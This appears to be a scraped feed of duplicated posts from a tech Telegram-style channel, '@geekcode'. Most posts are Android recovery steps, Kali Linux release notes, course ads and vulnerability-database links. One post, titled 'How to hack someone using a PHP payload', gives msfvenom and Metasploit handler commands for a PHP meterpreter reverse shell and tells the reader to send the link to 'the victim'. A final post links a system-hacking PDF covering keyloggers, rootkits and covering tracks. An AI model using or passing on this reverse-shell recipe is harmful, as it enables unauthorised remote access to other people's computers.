How to recover deleted
image or video from
android (internal
storage) without root ?
STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
STEP 2: SELECT DATA GENRE THAT YOU NEED TO
SCAN
After installation, run the app at your PC. You will
see the interface show you four options:
“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.
STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY
COMPUTER.
First, connect your android device to computer via
USB cable. Then, turn on USB debugging at android
equipment.
If the app failed to identify your equipment, install
related USB driver at your computer.
STEP 4: SCAN ANDROID DEVICE AND EXPECT THE
RESULT
After identification, click "Start" for scanning. Please
be patient about the process.
STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
You will be able to review all the details of desired
data.
STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
Mark those data that you want, then tap “Recover”
to fulfill android data recovery without root.
#share & #supportus
-------------------> @geekcode 📍
Share as more as 😍
image or video from
android (internal
storage) without root ?
STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
STEP 2: SELECT DATA GENRE THAT YOU NEED TO
SCAN
After installation, run the app at your PC. You will
see the interface show you four options:
“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.
STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY
COMPUTER.
First, connect your android device to computer via
USB cable. Then, turn on USB debugging at android
equipment.
If the app failed to identify your equipment, install
related USB driver at your computer.
STEP 4: SCAN ANDROID DEVICE AND EXPECT THE
RESULT
After identification, click "Start" for scanning. Please
be patient about the process.
STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
You will be able to review all the details of desired
data.
STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
Mark those data that you want, then tap “Recover”
to fulfill android data recovery without root.
#share & #supportus
-------------------> @geekcode 📍
Share as more as 😍
📌Kali Linux 2020.4 Release
❓What’s different with this release since 2020.3 in August 2020 is:
🔰ZSH is the new default shell – We said it was happening last time, Now it has. ZSH. Is. Now. Default.
🔰Bash shell makeover – It may not function like ZSH, but now Bash looks like ZSH.
🔰Partnership with tools authors – We are teaming up with byt3bl33d3r.
🔰Message at login – Proactively pointing users to resources.
🔰AWS image refresh – Now on GovCloud. Includes Kali’s default (command line) tools again. And there is a new URL.
🔰Packaging Guides – Want to start getting your tool inside of Kali? This should help.
🔰New Tools & Updates – New Kernel and various new tools and updates for existing ones, as well as setting Proxychains 4 as default.
🔰NetHunter Updates – New NetHunter settings menu, select from different boot animations, and persistent Magisk.
🔰Win-KeX 2.5 – New “Enhanced Session Mode” brings Win-KeX to ARM devices
🔰Vagrant & VMware – We now support VMware users who use Vagrant.
https://www.kali.org/news/kali-linux-2020-4-release/
#share & #supportus
-------------------> @geekcode 📍
Share as more as 😍
❓What’s different with this release since 2020.3 in August 2020 is:
🔰ZSH is the new default shell – We said it was happening last time, Now it has. ZSH. Is. Now. Default.
🔰Bash shell makeover – It may not function like ZSH, but now Bash looks like ZSH.
🔰Partnership with tools authors – We are teaming up with byt3bl33d3r.
🔰Message at login – Proactively pointing users to resources.
🔰AWS image refresh – Now on GovCloud. Includes Kali’s default (command line) tools again. And there is a new URL.
🔰Packaging Guides – Want to start getting your tool inside of Kali? This should help.
🔰New Tools & Updates – New Kernel and various new tools and updates for existing ones, as well as setting Proxychains 4 as default.
🔰NetHunter Updates – New NetHunter settings menu, select from different boot animations, and persistent Magisk.
🔰Win-KeX 2.5 – New “Enhanced Session Mode” brings Win-KeX to ARM devices
🔰Vagrant & VMware – We now support VMware users who use Vagrant.
https://www.kali.org/news/kali-linux-2020-4-release/
#share & #supportus
-------------------> @geekcode 📍
Share as more as 😍
Kali Linux
Kali Linux 2020.4 Release (ZSH, Bash, CME, MOTD, AWS, Docs, Win-KeX & Vagrant) | Kali Linux Blog
We find ourselves in the 4th quarter of 2020, and we are ecstatic to announce the release of Kali Linux 2020.4, which is ready for immediate download or updating.
What’s different with this release since 2020.3 in August 2020 is:
ZSH is the new default shell…
What’s different with this release since 2020.3 in August 2020 is:
ZSH is the new default shell…
https://www.udemy.com/course/spring-5-with-spring-boot-2/?couponCode=TELUSKONOV20
#share & #supportus
--------------------> @geekcode 📍
Share as more as 😍
#share & #supportus
--------------------> @geekcode 📍
Share as more as 😍
Udemy
Java Spring Framework 6, Spring Boot 3, Spring AI Telusko
Master Java, Spring 6 and Spring Boot 3 , Spring JPA, Security, Spring AI, Docker and Microservices with Telusko
#AINews: Microsoft has teamed up with a nonprofit using autonomous ‘interceptor’ boats to clean up the ocean and is helping it identify trash with machine learning. 🌊
Learn more on: https://www.businessinsider.com/microsoft-machine-learning-for-the-ocean-cleanup-project-2020-10
#share & #supportus
-----------------------> @geekcode 📍
Share as more as 😍
Learn more on: https://www.businessinsider.com/microsoft-machine-learning-for-the-ocean-cleanup-project-2020-10
#share & #supportus
-----------------------> @geekcode 📍
Share as more as 😍
Hey guys Geek-Code is Here ♥️
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
All-in-One Facebook Ads Course! From Beginner To Advanced!
Step By Step Guide Of How To Create Different Ad Campaigns, Pixel, Custom & Lookalike Audiences, Retargeting And More!
How To Create A FB Business Account
How To Create Ad Account
How To Add Payment Method
Security Measure – How To Set Ad Spent Limit
ENROLL HERE-:
https://geekcode.com/Facebook-Ads-Course
#share & #supportus
---------------> @geekcode 📍
Share as more as 😍
Step By Step Guide Of How To Create Different Ad Campaigns, Pixel, Custom & Lookalike Audiences, Retargeting And More!
How To Create A FB Business Account
How To Create Ad Account
How To Add Payment Method
Security Measure – How To Set Ad Spent Limit
ENROLL HERE-:
https://geekcode.com/Facebook-Ads-Course
#share & #supportus
---------------> @geekcode 📍
Share as more as 😍
🗃 WEBSITE OF THE DAY👨💻
━━━━━━━━━━━━
Website: Devdocs.io
A fast ,offline, free and reliable document browser for devlopers. One of the best websites to get free resources for beginner programmers. Search 100+ Doc's in one, HTLM, C++, JAVA, PYTHON, Etc.
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
━━━━━━━━━━━━
Website: Devdocs.io
A fast ,offline, free and reliable document browser for devlopers. One of the best websites to get free resources for beginner programmers. Search 100+ Doc's in one, HTLM, C++, JAVA, PYTHON, Etc.
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
Hey guys Geek-Code is Here ♥️
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
Road to 1.6k 🙏
Only 20 subscribers left to achieve at 1.6k😍
#share us for Care us #supportus
@geekcode 📍
🔰 Vulnerability Database And Resources For Free 🔰
Vulnerability Database are the first place to start your day as a security professional. Any new vulnerability detection is generally available through public vulnerability database. These database are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. Some Public Sources for you -
⚡️http://www.exploit-db.com/
⚡️http://securityvulns.com/
⚡️http://www.securityfocus.com/
⚡️http://www.securiteam.com/
⚡️http://secunia.com/advisories/
⚡️http://insecure.org/sploits_all.html
⚡️http://zerodayinitiative.com/advisories/published/
⚡️http://nmrc.org/pub/index.html
⚡️http://web.nvd.nist.gov
⚡️http://cvedetails.com/
⚡️http://www.rapid7.com/vulndb/index.jsp
⚡️http://oval.mitre.org
#share us for Care us #supportus
@geekcode 📍
Vulnerability Database are the first place to start your day as a security professional. Any new vulnerability detection is generally available through public vulnerability database. These database are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. Some Public Sources for you -
⚡️http://www.exploit-db.com/
⚡️http://securityvulns.com/
⚡️http://www.securityfocus.com/
⚡️http://www.securiteam.com/
⚡️http://secunia.com/advisories/
⚡️http://insecure.org/sploits_all.html
⚡️http://zerodayinitiative.com/advisories/published/
⚡️http://nmrc.org/pub/index.html
⚡️http://web.nvd.nist.gov
⚡️http://cvedetails.com/
⚡️http://www.rapid7.com/vulndb/index.jsp
⚡️http://oval.mitre.org
#share us for Care us #supportus
@geekcode 📍
🔰HOW TO HACK SOMEONE USING A PHP~PAYLOAD🔰
💖sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴘᴀʏʟᴏᴀᴅs ᴡɪᴛʜ ᴘʜᴘ ᴜsɪɴɢ ᴍsғᴠᴇᴍᴏɴ
💖ᴡʜᴀᴛ ɪs ᴍsғᴠᴇᴍᴏɴ?? ᴡᴇʟʟ ᴍᴇᴛᴀsᴘʟᴏɪᴛ ғʀᴀᴍᴇᴡᴏʀᴋ ᴠᴇɴᴏᴍ ɪs ᴀ ᴘᴀʏʟᴏᴀᴅ ɢᴇɴ ᴜsᴇᴅ ᴏɴ ʟɪɴᴜɴx ᴛᴏ ɢᴇɴᴇʀᴀᴛᴇ ᴘᴀʏʟᴏᴀᴅs ғᴏʀ ᴇxᴘʟᴏɪᴛᴀᴛɪᴏɴ
💖ʟᴇᴛs sᴛᴀʀᴛ ʙʏ sᴛᴀʀᴛɪɴɢ ᴀᴘᴀᴄʜᴇ2 sᴏ ᴏᴘᴇɴ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
sᴇʀᴠɪᴄᴇ ᴀᴘᴀᴄʜᴇ2 sᴛᴀʀᴛ
🌀sᴛᴇᴘ 1:
ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴏᴜʀ ʟᴏᴄᴀʟ ɪᴘ ᴏʀ ᴇxᴛᴇʀɴᴀʟ ɪᴘ ғᴏʀ ʟᴏᴄᴀʟ ɪᴘ ᴇɴᴛᴇʀ
ᴄᴏᴅᴇ:
–––––––––––––––––––
ɪғᴄᴏɴғɪɢ
ᴀɴᴅ ғᴏʀ ᴇxᴛᴇʀɴᴀʟ ɢᴏᴏɢʟᴇ ᴡʜᴀᴛs ᴍʏ ɪᴘ
ɴᴏᴛᴇ ɪғ ᴜsɪɴɢ ᴇxᴛᴇʀɴᴀʟ ʟɪɴᴋ ᴜ ɴᴇᴇᴅ ᴛᴏ ғᴏʀᴡᴀʀᴅ ᴛʜᴇ ᴘᴏʀᴛs ᴏɴ ʏᴏᴜʀ ʀᴏᴜᴛᴇʀ
🌀sᴛᴇᴘ 2:
ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛʜᴇ ʟᴏᴄᴀʟ ɪᴘ, sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ
ᴇɴᴛᴇʀ ᴛʜɪs ᴄᴏᴍᴍᴀɴᴅ:
ᴄᴏᴅᴇ:
–––––––––––––––––––
ᴍsғᴠᴇɴᴏᴍ -ᴘ ᴘʜᴘ/ᴍᴇᴛᴇʀᴘʀᴇᴛᴇʀ/ʀᴇᴠᴇʀsᴇ_ᴛᴄᴘ ʟʜᴏsᴛ= 192.168.8.107 ʟᴘᴏʀᴛ=4444 -ᴇ ᴘʜᴘ/ʙᴀsᴇ64 -ғ ʀᴀᴡ > /ʀᴏᴏᴛ/ᴅᴇsᴋᴛᴏᴘ/ʜᴏᴍᴇ.ᴘʜᴘ
🌀sᴛᴇᴘ 3:
ɴᴏᴡ ɢᴏ ᴛᴏ ᴛʜᴇ ᴅᴇsᴋᴛᴏᴘ ᴀɴᴅ ᴄᴏᴘʏ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ ᴛᴏ ʏᴏᴜʀ ʜᴛᴍʟ ғɪʟᴇ ɪɴ /ᴠᴀʀ/ᴡᴡ ᴡ/ʜᴛᴍʟ ғᴏʟᴅᴇʀ
ʀᴇᴍᴏᴠᴇ ᴛʜᴇ sᴘᴀᴄᴇ ^^
🌀sᴛᴇᴘ 4:
ɴᴏᴡ ᴏᴘᴇɴ ᴀ ɴᴇᴡ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
MSFCONSOL
🌀sᴛᴇᴘ 5:
TYPE BELOW COMMAND'S
ᴄᴏᴅᴇ:
–––––––––––––––––––
USE EXPLOIT/MULTI/HANDLER
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET PAYLOAD PHP/METERPRETER/REVERSE_TCP
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LHOST [YOUR LOCAL IP]
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LPORT 4444
ᴄᴏᴅᴇ:
–––––––––––––––––––
EXPLOIT
🌀sᴛᴇᴘ 6:
ɴᴏᴡ sᴇɴᴅ ᴛʜᴇ ᴠɪᴄᴛᴜᴍ ᴛʜᴇ ʟɪɴᴋ 192.168.8.107:4444/Home.php
🌀sᴛᴇᴘ 7:
ɴᴏᴡ ᴛʏᴘᴇ ʜᴇʟᴘ ᴀɴᴅ ʏᴏᴜ ɢᴇᴛ ᴀ ғᴜʟʟ ʟɪsᴛ ᴄᴏᴍᴍᴀɴᴅs ʏᴏᴜ ᴄᴀɴ ʀᴜɴ ᴜɴᴅᴇʀ ᴍᴇᴛᴀsᴘʟᴏɪᴛ
#share & #supportus
---------------------> @geekcode 📍
Share as more as 😍
💖sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴘᴀʏʟᴏᴀᴅs ᴡɪᴛʜ ᴘʜᴘ ᴜsɪɴɢ ᴍsғᴠᴇᴍᴏɴ
💖ᴡʜᴀᴛ ɪs ᴍsғᴠᴇᴍᴏɴ?? ᴡᴇʟʟ ᴍᴇᴛᴀsᴘʟᴏɪᴛ ғʀᴀᴍᴇᴡᴏʀᴋ ᴠᴇɴᴏᴍ ɪs ᴀ ᴘᴀʏʟᴏᴀᴅ ɢᴇɴ ᴜsᴇᴅ ᴏɴ ʟɪɴᴜɴx ᴛᴏ ɢᴇɴᴇʀᴀᴛᴇ ᴘᴀʏʟᴏᴀᴅs ғᴏʀ ᴇxᴘʟᴏɪᴛᴀᴛɪᴏɴ
💖ʟᴇᴛs sᴛᴀʀᴛ ʙʏ sᴛᴀʀᴛɪɴɢ ᴀᴘᴀᴄʜᴇ2 sᴏ ᴏᴘᴇɴ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
sᴇʀᴠɪᴄᴇ ᴀᴘᴀᴄʜᴇ2 sᴛᴀʀᴛ
🌀sᴛᴇᴘ 1:
ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴏᴜʀ ʟᴏᴄᴀʟ ɪᴘ ᴏʀ ᴇxᴛᴇʀɴᴀʟ ɪᴘ ғᴏʀ ʟᴏᴄᴀʟ ɪᴘ ᴇɴᴛᴇʀ
ᴄᴏᴅᴇ:
–––––––––––––––––––
ɪғᴄᴏɴғɪɢ
ᴀɴᴅ ғᴏʀ ᴇxᴛᴇʀɴᴀʟ ɢᴏᴏɢʟᴇ ᴡʜᴀᴛs ᴍʏ ɪᴘ
ɴᴏᴛᴇ ɪғ ᴜsɪɴɢ ᴇxᴛᴇʀɴᴀʟ ʟɪɴᴋ ᴜ ɴᴇᴇᴅ ᴛᴏ ғᴏʀᴡᴀʀᴅ ᴛʜᴇ ᴘᴏʀᴛs ᴏɴ ʏᴏᴜʀ ʀᴏᴜᴛᴇʀ
🌀sᴛᴇᴘ 2:
ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛʜᴇ ʟᴏᴄᴀʟ ɪᴘ, sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ
ᴇɴᴛᴇʀ ᴛʜɪs ᴄᴏᴍᴍᴀɴᴅ:
ᴄᴏᴅᴇ:
–––––––––––––––––––
ᴍsғᴠᴇɴᴏᴍ -ᴘ ᴘʜᴘ/ᴍᴇᴛᴇʀᴘʀᴇᴛᴇʀ/ʀᴇᴠᴇʀsᴇ_ᴛᴄᴘ ʟʜᴏsᴛ= 192.168.8.107 ʟᴘᴏʀᴛ=4444 -ᴇ ᴘʜᴘ/ʙᴀsᴇ64 -ғ ʀᴀᴡ > /ʀᴏᴏᴛ/ᴅᴇsᴋᴛᴏᴘ/ʜᴏᴍᴇ.ᴘʜᴘ
🌀sᴛᴇᴘ 3:
ɴᴏᴡ ɢᴏ ᴛᴏ ᴛʜᴇ ᴅᴇsᴋᴛᴏᴘ ᴀɴᴅ ᴄᴏᴘʏ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ ᴛᴏ ʏᴏᴜʀ ʜᴛᴍʟ ғɪʟᴇ ɪɴ /ᴠᴀʀ/ᴡᴡ ᴡ/ʜᴛᴍʟ ғᴏʟᴅᴇʀ
ʀᴇᴍᴏᴠᴇ ᴛʜᴇ sᴘᴀᴄᴇ ^^
🌀sᴛᴇᴘ 4:
ɴᴏᴡ ᴏᴘᴇɴ ᴀ ɴᴇᴡ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ
ᴄᴏᴅᴇ:
–––––––––––––––––––
MSFCONSOL
🌀sᴛᴇᴘ 5:
TYPE BELOW COMMAND'S
ᴄᴏᴅᴇ:
–––––––––––––––––––
USE EXPLOIT/MULTI/HANDLER
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET PAYLOAD PHP/METERPRETER/REVERSE_TCP
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LHOST [YOUR LOCAL IP]
ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LPORT 4444
ᴄᴏᴅᴇ:
–––––––––––––––––––
EXPLOIT
🌀sᴛᴇᴘ 6:
ɴᴏᴡ sᴇɴᴅ ᴛʜᴇ ᴠɪᴄᴛᴜᴍ ᴛʜᴇ ʟɪɴᴋ 192.168.8.107:4444/Home.php
🌀sᴛᴇᴘ 7:
ɴᴏᴡ ᴛʏᴘᴇ ʜᴇʟᴘ ᴀɴᴅ ʏᴏᴜ ɢᴇᴛ ᴀ ғᴜʟʟ ʟɪsᴛ ᴄᴏᴍᴍᴀɴᴅs ʏᴏᴜ ᴄᴀɴ ʀᴜɴ ᴜɴᴅᴇʀ ᴍᴇᴛᴀsᴘʟᴏɪᴛ
#share & #supportus
---------------------> @geekcode 📍
Share as more as 😍
Ethical Hacking and Countermeasures
• Password cracking
• Password attacks
• Identifying various password cracking tools
• Formulating countermeasures for password cracking
• Escalating privileges
• Executing applications
• Keyloggers and Spywares
• Spywares and keyloggers countermeasures
• Hiding files
• Understanding rootkits
• The use of Steganography
• Covering tracks
https://anonfiles.com/10T3G4jbp7/System_Hacking_pdf
"Get all the ideas about system hacking."
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍
• Password cracking
• Password attacks
• Identifying various password cracking tools
• Formulating countermeasures for password cracking
• Escalating privileges
• Executing applications
• Keyloggers and Spywares
• Spywares and keyloggers countermeasures
• Hiding files
• Understanding rootkits
• The use of Steganography
• Covering tracks
https://anonfiles.com/10T3G4jbp7/System_Hacking_pdf
"Get all the ideas about system hacking."
#share & #supportus
----------------> @geekcode 📍
Share as more as 😍